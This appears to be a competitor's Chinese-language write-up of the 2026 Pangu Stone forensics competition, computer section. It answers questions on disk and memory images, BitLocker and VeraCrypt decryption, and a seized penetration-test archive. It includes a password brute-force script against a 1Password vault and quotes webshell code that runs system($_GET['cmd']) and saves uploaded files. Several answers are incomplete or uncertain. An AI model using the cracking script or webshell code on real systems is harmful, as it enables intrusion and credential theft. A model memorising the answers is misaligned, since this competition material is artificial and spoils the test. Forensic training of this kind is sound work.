盘古石2026--计算机部分(纯手搓)
liuyang.E01
1
分析刘洋liuyang_pc.E01检材,提取磁盘镜像SHA1值的前6位?[答案格式:字母小写]
5bc418
2
分析刘洋liuyang_pc.E01检材,计算机系统Build版本为?[答案格式:19000]
26100
3
分析刘洋liuyang_pc.E01检材,计算机最后一次正常关机的时间为?UTC+0[答案格式:2025-05-06-09:00:00]
2026-04-20-16:25:35
而注意到;
所以时间减去8小时
4
分析刘洋liuyang_pc.E01检材,计算机网卡的MAC地址为?[答案格式:00-0B-00-A0-00-00]
00-50-56-30-26-1C
5
分析刘洋liuyang_pc.E01检材,分析机主是从那里下载的typora?[答案格式:阿里云]
蓝奏云
在Chrome的下载记录里看到该软件
虽然网页不可用,但是可以看到这是蓝奏云的logo
6
分析刘洋liuyang_pc.E01检材,刘洋在2026-04-19 13:46:01(UTC +0)曾访问过百度云盘,请给云盘的打开密码?[答案格式:11aa]
48gy
注意UTC +0,所以我们找的时间要加8,时间上搜索
问云盘密码,大概率都是在浏览器的聊天记录里
得到48gy
7
分析刘洋liuyang_pc.E01检材,请给出刘洋管理pve集群所用的端口号?[答案格式:8000]
8006
8
分析刘洋liuyang_pc.E01检材,请给出刘洋登录理财网站所使用的密码?[答案格式:password]
admin123
翻浏览器记录可以发现保存过的密码admin123
9
分析刘洋liuyang_pc.E01检材,请给出理财网站的IP地址?[答案格式:127.0.0.1]
192.168.0.70
这个题我原来的做法:这个理财软件我们在上道题已经知道了URL,在仿真里面输入命令,查看DNS日志
nslookup 3w.jlzb.vip
输出的是
C:\Users\刘洋>nslookup 3w.jlzb.vip
DNS request timed out.
timeout was 2 seconds.
服务器: UnKnown
Address: 192.168.2.1
DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** 请求 UnKnown 超时
192.168.2.1 只是本地路由器的地址,不是目标 IP。
正解:
查看一下本地hosts文件
192.168.0.70
在火眼里面看
在仿真镜像里面看
知识点:C:\Windows\System32\drivers\etc\hosts 是本地静态 DNS 映射文件,优先级高于外部 DNS 查询。
10
分析刘洋liuyang_pc.E01检材,请给出计算机内Bitlocker加密分区恢复密钥的前6位?[答案格式:6位数字]
560615-577522-342881-216865-242561-312356-584837-421597
这里拿内存镜像爆破Bitlocker密码
得到密码 560615-577522-342881-216865-242561-312356-584837-421597
11
分析刘洋liuyang_pc.E01检材,找出VC加密容器的密钥文件,给出该密钥文件的绝对路径?[答案格式:D:\ABC\123\测试.txt]
D:\BaiduNetdiskDownload\无标题.png
首先从12题题目里面可以猜出这个文件是图像
解密bitlocker的分区:
在D:\BaiduNetdiskDownload看到了一个无标题的PNG
再观察到电脑自带的图片里面有个一模一样的
猜测可能存在隐写
放到随波逐流里边发现果然存在高隐写
这里已经明确说明了VC容器密钥文件
所以得到答案:"D:\BaiduNetdiskDownload\无标题.png"
12
接上题,该VC加密容器的密钥文件的图像高度是多少像素?[答案格式:1345]
值得注意的是这里问的图像高度是高度修复后的图像高度,比赛的时候这里错了T_T
所以是答案是1080
13
分析刘洋liuyang_pc.E01检材,请给出团队重要信息加密保存的软件名?[答案格式:abc123]
1Password
再下载里面找到了1password,但是需要密码
在上面的压缩包里可以找到提示
说明这就是个团队重要信息加密保存的软件
14
分析刘洋liuyang_pc.E01检材,该软件的保险库文件名为什么?[答案格式:abc.abc]
liuyang@6419
在文档处还看到了一个1Password的文件夹,打开发现是软件的保险库
opvault 是 1Password 密码管理器 的本地加密密码库文件格式。
15
分析刘洋liuyang_pc.E01检材,该软件的保险库文件打开密码是什么?[答案格式:124@password]
liuyang@6419
根据压缩包的提示,来爆破一下密码,分析liuyang.opvault编写脚本
import hashlib
import hmac
import base64
import struct
import sys
import time
from multiprocessing import Pool, cpu_count
# OPVault 密钥参数
SALT = base64.b64decode("IeURd51uAYC1eLekU4BwFA==")
ITERATIONS = 100000
# OPVault 中的 overviewKey 和 masterKey(Base64 编码)
OVERVIEW_KEY_B64 = "b3BkYXRhMDEAAAAAAAAAACDcPhy5RqzGti3mEraiflCWM3tkcTXdKYimn0yGOpegf5ECqqovRBauxoeTlU7fCZRy0zmIOuhcHsNnVx8bYs6u+HUJBpgdVJjqAnMLYIHMlbhxNcC+HMJdVmYinkBuM3Gop9N9XxK08K/mENTbWQfYiBLEj91LgxkCRobA3pKh"
MASTER_KEY_B64 = "b3BkYXRhMDEAAQAAAAAAAGfym+bTedJNHPrsp1DtSrH4iu7nA3lMUHzuq1H49jlwIvSES6b55ZGNZHA0xtyJgifKgDgc82rEOJLNzSg4Xl+qaGCk33/tJmEZWS6r7Ef+wSErsxNcUYQxVHkaWQtbofQ8vif+46dYXBGfTiT5a/JEQU2X6bn2Snd5jkOSz62sPQcuHYwJ1lFxLv4WYRWROVKMvVA4b0ByNrjTmfUHrSuPv3JuBNfiLXX69LvVPW8EdznhnZG4BlU1+m3ZCZr2HST9+04JMhFJhj0UmhO07nijbUIvcDxeqJoeznyZ1CC6eocrQlvyv2EIAOMxcMmSuCGY2CMw+MPCdlklnLEdaULfhgEEaNHfWnpFFnVql5P5B1xZOHP80SW9qzmRmzoxQ/l7tOP7XEGld2vwHQlS+Smrzp2XVDRAi8yDVMH4rmJS"
# 解码密钥数据
overview_key_raw = base64.b64decode(OVERVIEW_KEY_B64)
overview_expected_hmac = overview_key_raw[-32:] # 最后 32 字节是 HMAC
overview_hmac_input = overview_key_raw[:-32] # 前面是 HMAC 输入数据
master_key_raw = base64.b64decode(MASTER_KEY_B64)
master_expected_hmac = master_key_raw[-32:]
master_hmac_input = master_key_raw[:-32]
def try_password(password):
"""尝试单个密码,使用 PBKDF2-SHA512 派生密钥并验证 HMAC"""
# PBKDF2 派生 64 字节密钥
derived = hashlib.pbkdf2_hmac(
'sha512',
password.encode('utf-8'),
SALT,
ITERATIONS,
dklen=64
)
# 后 32 字节作为 HMAC 密钥
mac_key = derived[32:64]
# 验证 overviewKey 的 HMAC
computed = hmac.new(mac_key, overview_hmac_input, hashlib.sha256).digest()
if hmac.compare_digest(computed, overview_expected_hmac):
return password
# 验证 masterKey 的 HMAC
computed2 = hmac.new(mac_key, master_hmac_input, hashlib.sha256).digest()
if hmac.compare_digest(computed2, master_expected_hmac):
return password
return None
def try_batch(start):
"""批量尝试密码:liuyang@0000 ~ liuyang@9999"""
for i in range(start, min(start + 50, 10000)):
password = f"liuyang@{i:04d}"
result = try_password(password)
if result:
return result
return None
if __name__ == '__main__':
print(f"[*] OPVault Brute Force - liuyang@0000 to liuyang@9999")
print(f"[*] PBKDF2-SHA512, {ITERATIONS} iterations")
print(f"[*] Using {cpu_count()} CPU cores")
print(f"[*] Starting...")
start_time = time.time()
batches = list(range(0, 10000, 50))
with Pool(processes=cpu_count()) as pool:
for idx, result in enumerate(pool.imap_unordered(try_batch, batches)):
if result:
elapsed = time.time() - start_time
print(f"\n[+] PASSWORD FOUND: {result}")
print(f"[+] Time elapsed: {elapsed:.1f} seconds")
pool.terminate()
sys.exit(0)
# 每处理 20 个批次打印进度
if idx % 20 == 0:
elapsed = time.time() - start_time
progress = (idx * 50) / 10000 * 100
print(f"[*] Progress: {progress:.1f}% ({idx*50}/10000) - {elapsed:.1f}s", end='\r')
elapsed = time.time() - start_time
print(f"\n[-] Password not found in range 0000-9999 ({elapsed:.1f}s)")
[*] OPVault Brute Force - liuyang@0000 to liuyang@9999
[*] PBKDF2-SHA512, 100000 iterations
[*] Using 32 CPU cores
[*] Starting...
[*] Progress: 60.0% (6000/10000) - 48.6s
[+] PASSWORD FOUND: liuyang@6419
[+] Time elapsed: 49.8 seconds
得到密码liuyang@6419
16
分析刘洋liuyang_pc.E01检材,请给出用户刘洋的开机密码?[答案格式:p@ssw0rd123]
6yang@2o26
用密码打开:
复制出来:6yang@2o26
17
分析刘洋liuyang_pc.E01检材,请给出pve服务器的管理密码?[答案格式:p@ssw0rd123]
pgscup2o@6
在保险库里面找到PVE然后编辑打开可以看到密码
18
分析刘洋liuyang_pc.E01检材,找出计算机内的脚本加密工具,给出该加密工具的SHA1的前6位?[答案格式:字母小写]
7860dc
到这里已经不知道怎么往后走了,所以尝试用唯一还没有开通的路:VC容器
在回收站里面找到:
在百度网盘的下载文件夹找到加密容器(这个东西有3G,很不正常)
用VC挂载一下,把密码 ‘ 8687f7d845649e03d02d4ff1f36ec952 ',pim2026全都挂上
得到;
这里没有东西,用修复过高的VC密钥+pim2026来解密
计算hash:
19
分析刘洋liuyang_pc.E01检材,该脚本加密工具在进行脚本加密时,最后一层是进行什么操作?[答案格式:字符替换]
十六进制转换
打开脚本就可以看到
20
分析刘洋liuyang_pc.E01检材,请解密该脚本加密工具加密的文件database.php.obf,给出该文件内的数据库密码?[答案格式:p@ssw0rd123]
pgscup@o26
根据加密写出解密:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import base64
XOR_KEY = 0x5A
BASE64_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
CUSTOM_TABLE = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"
def xor_decrypt(data):
result = []
for i, c in enumerate(data):
result.append(chr(ord(c) ^ (XOR_KEY + i) % 256))
return ''.join(result)
def char_swap_decode(data):
trans = str.maketrans(CUSTOM_TABLE, BASE64_TABLE)
return data.translate(trans)
def deobfuscate(data):
step4 = bytes.fromhex(data).decode('utf-8')
step3 = char_swap_decode(step4)
step2 = base64.b64decode(step3).decode('utf-8')
step1 = xor_decrypt(step2)
return step1
def decrypt_file(input_path, output_path):
with open(input_path, 'r', encoding='utf-8') as f:
content = f.read()
deobfuscated = deobfuscate(content)
with open(output_path, 'w', encoding='utf-8') as f:
f.write(deobfuscated)
print("[OK] %s -> %s" % (input_path, output_path))
if __name__ == "__main__":
if len(sys.argv) < 3:
print("用法: python decrypt_tool.py <输入文件> <输出文件>")
sys.exit(1)
decrypt_file(sys.argv[1], sys.argv[2])
运行得到:
- 文件 : C:\Users\q1388\Desktop\database.php
- 数据库类型 : MySQL
- 主机 : 127.0.0.1:3306
- 数据库名 : jinqin
- 用户名 : root
- 密码 : pgscup@o26
21
分析刘洋liuyang_pc.E01检材,找出刘洋计算机内的交易信息.rar,给出该文件的打开密码?[答案格式:p@ssw0rd123]
pgscup@9541
拿最开始挂载VC得到的密码进行导出这个rar
拿passwarekit爆破得到密码:pgscup@9541
22
分析刘洋liuyang_pc.E01检材,找出刘洋计算机内刘桂荣的身份证号码?[答案格式:5…..1]
rar里面全是表格,直接搜索
搜出来三个。。。
420100194707075594
420100200106295186
500000196606302245
有三个....不知道答案选哪个
ly-memdump.mem
23
分析刘洋ly-memdump.mem镜像,给出用户刘洋的NT哈希值?[答案格式:数字字母组合,字母小写]
876dfe7bd78730b7b0baaf451414de8e
24
分析刘洋ly-memdump.mem镜像,给出1Password密码管理器的数据库文件名?[答案格式:123ABc.abc]
1Password10.sqlite
在lovelymem的文件搜索里面搜索1Password
知识点:
文件名
说明
1password.sqlite
主数据库文件(最常见)
B5.sqlite
1Password 账户数据库(B5 指 1Password 的云端服务架构代号)
1password10.sqlite
较新版本的数据库
op.sqlite
1Password CLI 工具的数据库
25
分析刘洋ly-memdump.mem镜像,1Password在VeraCrypt启动后约多少分钟启动?[答案格式:123]
2
进程列表搜索VeraCrypt
再搜1Password
(这里的createTime指的是进程创建的时间,也就是exe的启动)
相减即可得到答案2
黄志远PC.E01
26
分析黄志远PC.E01镜像,黄志远使用的ai agent的名称是什么?[答案格式:www]
hermes
(这里需要经验积累,Linux没有hermes这个命令)
27
分析黄志远PC.E01镜像,黄志远使用的模型api后4位是什么?[答案格式:abcd]
PC.E01/分区2/home/kali/.hermes/state.db
也可以用DBbrowser看
完美!我已经成功更新了:
1. **DeepSeek API密钥**:已更新为 `sk-dfesagheoghjopghjihgioa`
2. **Discord Bot Token**:已更新为 `dfjaoegjhoegeasgoeihgioengoeng`
配置更新完成!现在Hermes Agent将使用新的API密钥连接到DeepSeek,并使用新的Discord Bot Token连接到Discord。
**注意**:为了让更改生效,你可能需要重启Hermes服务(如果它正在运行)。你可以使用以下命令重启:
```bash
hermes restart
或者如果使用了systemd服务:
systemctl --user restart hermes-gateway
更新完成!
### 28
请分析黄志远PC.E01镜像中的渗透.rar文件,分析黄志远PC.E01镜像,黄志远总共攻击了多少台主机?\[答案格式:123\]
**16**
在目录里面找到一个加密的RAR
在kali/ 渗透密码里面找到一堆图片,显然这是个拼图部分
对着reference.png进行拼图(这里采用montage+gaps自动排序的方法)
magick montage patch_*.png -tile 20x25 -geometry +0+0 flag.png
(此处可以瞪眼法出密码)整体像素:600\*1025,图片碎片像素:30\*41,得到20列\*25行
找到密码;
今晚去杀鬼
打开压缩包,得到渗透报告
### 29
请分析黄志远PC.E01镜像中的渗透.rar文件,反编译exploit二进制文件发现其调用了setuid()、setgid()和system("/bin/bash"),该程序的源文件编译前名称是什么?\[答案格式:xxx.c\]
**exploit.c**
用Ida打开,反编译main函数,发现调用这些函数
发现是C语言调用的函数,文件是C语言
放到kali里面用string提取
提取字符串 ' `strings exploit '`看到两个.c文件
特征
`crtstuff.c`
`exploit.c`
**来源**
GCC 编译器内置
用户编写
**作用**
C 运行时初始化(所有 C 程序都有)
程序的实际业务逻辑
**出现位置**
任何 GCC 编译的 ELF 文件都会出现
只有这个特定程序才有
**可辨识度**
通用、标准
与程序功能直接相关
所以得到答案
### 30
请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 功能逻辑研判观察 file\_shell.php 的源码,若攻击者请求 ?download=/etc/passwd,程序执行的核心函数是什么?\[答案格式:func()\]
**readfile()**
打开代码:
31
请分析黄志远PC.E01镜像中的渗透.rar文件,Nikto扫描结果发现通过发送超长斜杠序列可以探测目录列举漏洞,该漏洞对应的CVE编号是什么?[答案格式:CVE-XXXX-XXXX]
CVE-2002-1078
".\PGS计算机部分\渗透\pentest-lab\nikto_scan.txt.txt"
下图是最开始错误做法,题目写的是通过超长///的CVE,所以应该是后面那个CVE
32
请分析黄志远PC.E01镜像中的渗透.rar文件,SQLite 数据库结构分析在 users 表的定义中,id 字段使用了 AUTOINCREMENT。这意味着什么?[答案格式:SQL_KEYWORD]
AUTOINCREMENT
做这个题的时候没有读懂意思,跟着题目一遍一遍来,在渗透报告表中可以找到
AUTOINCREMENT是SQLite的关键字
确保id字段自动递增且永不重用已删除的ID值
与单纯的PRIMARY KEY不同,AUTOINCREMENT保证ID严格递增
所以这意味着 id 字段的值会自动生成,且严格单调递增、永不重复,常用于主键(如用户 ID、订单号等需要唯一标识的场景)。
因为本人感觉语文理解上很吃力,所以这个地方放个ai解释
33
请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 命令执行参数若要利用 file_shell.php 获取当前系统的用户权限,正确的 URL 参数构造是什么?[答案格式:cmd=xxx]、
cmd=id
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
Linux系统中id 命令用于显示当前用户或指定用户的身份标识信息,包括用户 ID、组 ID 等。这些 ID 是 Linux 权限划分的基础。(值得注意的是ID是一种命令,uid/gid/groups这些是信息)
Linux 权限三层结构:1. 所有者 (Owner) → uid 决定
2. 所属组 (Group) → gid 决定
3. 其他人 (Others) → 非 uid/gid 用户
UID 值
用户
权限级别
0
root
超级管理员,系统最高权限
1-999
系统用户
运行系统服务,权限受限
1000+
普通用户
日常操作,默认只能访问自己的文件
34
请分析黄志远PC.E01镜像中的渗透.rar文件,API 端口风险判定8000端口运行的技术组件是什么?[答案格式:XxxYyy]
FastApi
在通讯录管理系统漏洞清单.md中找到开放端口信息
35
请分析黄志远PC.E01镜像中的渗透.rar文件,数据库存储安全性评估users 表的密码存储存在什么安全隐患?[答案格式:CVE-XXXX-XXXX]
CVE-2026-0005
渗透测试报告_192.168.61.135.md
36
请分析黄志远PC.E01镜像中的渗透.rar文件,文件上传漏洞利用条件利用 upload.php 上传漏洞后,攻击者利用 Webshell 前最关键的一步是什么?[答案格式:xxx/
uploads/
在通讯录管理系统漏洞清单.md
37
请分析黄志远PC.E01镜像中的渗透.rar文件,根据通讯录管理系统漏洞清单,CVE-2026-0003(无限制文件上传漏洞)的CVSS评分是多少?[答案格式:1.2]
8.8
38
请分析黄志远PC.E01镜像中的渗透.rar文件,根据file_shell.php源码,文件上传功能使用哪个PHP函数将临时文件移动到目标路径?[答案格式:php_func]
move_uploaded_file
if(isset($_FILES['file'])) {
$target = basename($_FILES['file']['name']);
if(move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
echo "File uploaded: $target<br>";
}
}
39
请分析黄志远PC.E01镜像中的渗透.rar文件,Web 目录遍历隐患uploads/ 目录启用目录列表功能通常由哪个组件控制?[答案格式:apache_opt]
apache_Indexes
在漏洞清单中可以看到
Apache通过Options指令中的Indexes选项控制目录列表的开启
Apache 选项
作用
Indexes
目录列表
FollowSymLinks
允许符号链接
Includes
允许 SSI
ExecCGI
允许 CGI 执行
MultiViews
内容协商
40
请分析黄志远PC.E01镜像中的渗透.rar文件,敏感凭据深度关联在 address_book.db 中,管理员密码 Str0ngP@ssw0rd2026! 是什么角色?[答案格式:SQL_DEFAULT]
按照题目打开db
41
请分析黄志远PC.E01镜像中的渗透.rar文件,数据规模与风险评估遭受泄露的个人联系人信息条数大约为多少?[答案格式:12345]
15000
通讯录管理系统漏洞清单中可以看到
42
请分析黄志远PC.E01镜像中的渗透.rar文件,系统运行权限分析Web服务器运行的用户身份是什么?[答案格式:xxx-xxx]
www-data
依旧这个md里面可以找到
43
请分析黄志远PC.E01镜像中的渗透.rar文件,命令行注入漏洞识别验证 tools.php 命令执行漏洞时,哪个命令返回了uid的值?[答案格式:cmd]
id
这个md里面搜索tools.php可以快速找到
44
请分析黄志远PC.E01镜像中的渗透.rar文件,数据库物理路径获取攻击者通过 generate_data.php 得知数据库在服务器上的绝对物理路径是什么?[答案格式:/xxx/xxx/xxx.db]
/var/www/html/address_book.db
渗透测试报告_192.168.61.135.md里面
45
请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 下载参数逻辑源码中通过设置哪个 Header 实现浏览器自动弹出下载框?[答案格式:Content-xxx]
Content-Disposition
因为这里涉及到header伪造,所以我们去程序里面找
在file-shell.php里边可以看到
46
请分析黄志远PC.E01镜像中的渗透.rar文件,身份验证策略评估系统中存在的弱密码策略漏洞不包括哪项?[答案格式:user/pass]
admin/Str0ngP@ssw0rd2026!
根据“弱密码”漏洞清单里面
然后之前的db里面可以看到非弱密码的Str0ngP@ssw0rd2026!,对应的是admin
47
请分析黄志远PC.E01镜像中的渗透.rar文件,API 环境交互日志价值未授权访问8000端口日志接口,最可能导致哪类敏感信息泄露?[答案格式:/api/xxx]
/api/logs
(同34题)
48
请分析黄志远PC.E01镜像中的渗透.rar文件,攻击路径逻辑推演攻击者获取持久访问权限的最典型方式是什么?[答案格式:xxx.php]
file_shell.php
首先目前只看到了一个php文件,可以直接勇敢者游戏
其次,在渗透测试报告里面:
49
请分析黄志远PC.E01镜像中的渗透.rar文件,漏洞 CVE 编号识读被标识为未授权命令执行漏洞的虚拟CVE编号是什么?[答案格式:CVE-XXXX-XXXX]
CVE-2026-0002
渗透报告里面可以找到
50
请分析黄志远PC.E01镜像中的渗透.rar文件,系统修复优先级研判24小时紧急加固中,哪项不属于立即修复级别?[答案格式:ABC]
WAF
在漏洞清单里面搜索“修复建议优先级”
51
请分析黄志远PC.E01镜像中的渗透.rar文件,管理员凭据有效性验证利用管理员密码,攻击者在哪个页面时才能生效?[答案格式:xxx.php]
tools.php
在这个清单的攻击链里
52
请分析黄志远PC.E01镜像中的渗透.rar文件,本系统使用的后端数据库技术是什么?[答案格式:DB_name]
SQLite
在漏洞清单里查看系统信息
53
请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 目录处理逻辑文件上传功能中,源码将上传后的文件命名为什么?[答案格式:$_xxx]
$_FILES['file']['name']
看到$_XXX,是PHP里面的格式,所以查看flie_shell.php文件
if(isset($_FILES['file'])) {
$target = basename($_FILES['file']['name']);
if(move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
echo "File uploaded: $target<br>";
}
}
部分
含义
$_FILES['file']
PHP 超全局数组,接收上传文件的信息
['name']
获取上传文件的原始文件名(如 shell.php)
basename()
提取路径中的文件名部分,去掉目录路径
$target
最终保存的目标文件名
54
请分析黄志远PC.E01镜像中的渗透.rar文件,目标系统运行的 Apache 具体版本号是什么?[答案格式:x.x.xx]
在漏洞清单里面
55
请分析黄志远PC.E01镜像中的渗透.rar文件,根据通讯录管理系统漏洞清单,CVE-2026-0001(敏感信息泄露漏洞)的CVSS评分是多少?[答案格式:1.2]
9.8
56
请分析黄志远PC.E01镜像中的渗透.rar文件,攻击者最终获取了什么角色的权限?[答案格式:xxx-xxx]
www-data在渗透测试报告里面
至此,计算机部分-完